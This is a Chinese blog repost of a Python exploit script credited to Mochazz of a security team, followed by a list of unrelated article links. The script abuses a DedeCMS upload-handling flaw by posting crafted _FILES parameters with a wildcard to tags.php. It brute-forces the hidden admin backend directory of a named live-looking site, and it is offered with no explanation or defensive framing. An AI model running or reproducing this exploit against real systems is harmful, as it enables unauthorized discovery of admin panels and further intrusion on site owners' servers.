DEDE暴力破解后台登录页面
2024-10-14 03:52:00
DEDE暴力破解后台登录页面
#!/usr/bin/env python
'''/*
* author = Mochazz
* team = 红日安全团队
* env = pyton3
*
*/
'''
import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://www.rmjdw.com/tags.php"
data = {
"_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
"_FILES[mochazz][name]" : 0,
"_FILES[mochazz][size]" : 0,
"_FILES[mochazz][type]" : "image/gif"
} for num in range(1,7):
if flag:
break
for pre in itertools.permutations(characters,num):
pre = ''.join(list(pre))
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
print("testing",pre)
r = requests.post(url,data=data)
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
flag = 1
back_dir = pre
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("[+] 前缀为:",back_dir)
flag = 0
for i in range(30):
if flag:
break
for ch in characters:
if ch == characters[-1]:
flag = 1
break
data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
r = requests.post(url, data=data)
if "Upload filetype not allow !" not in r.text and r.status_code == 200:
back_dir += ch
print("[+] ",back_dir)
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
break
else:
data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif" print("后台地址为:",back_dir)
最新文章
- Ctrip Mydream
- tomcat启动时候报错Can&#39;t convert argument: null
- Gulp的使用教程
- APP图标和启动页
- C#调用杀毒软件MSE扫描指定目录或文件
- Python成长笔记 - 基础篇 (二)python基本语法
- C/C++文件操作2
- 选择两个字段时distinct位置的影响
- flash 动画数据导出 到 coco2d-js ,cocos2d-x 问题的记录
- Dalvik指令集
- [Leetcode][Python]56: Merge Intervals
- 浅谈JNDI的使用
- Java第二季
- Stripes视图框架与Struts2之间的比较
- express脚手架的安装,以及ejs的语法
- HTML5本地存储localStorage与sessionStorage详解
- Codeforces 832E Vasya and Shifts - 高斯消元
- Objective-C 入门笔记
- Spring的Controller映射规则
- Archiva与maven配置使用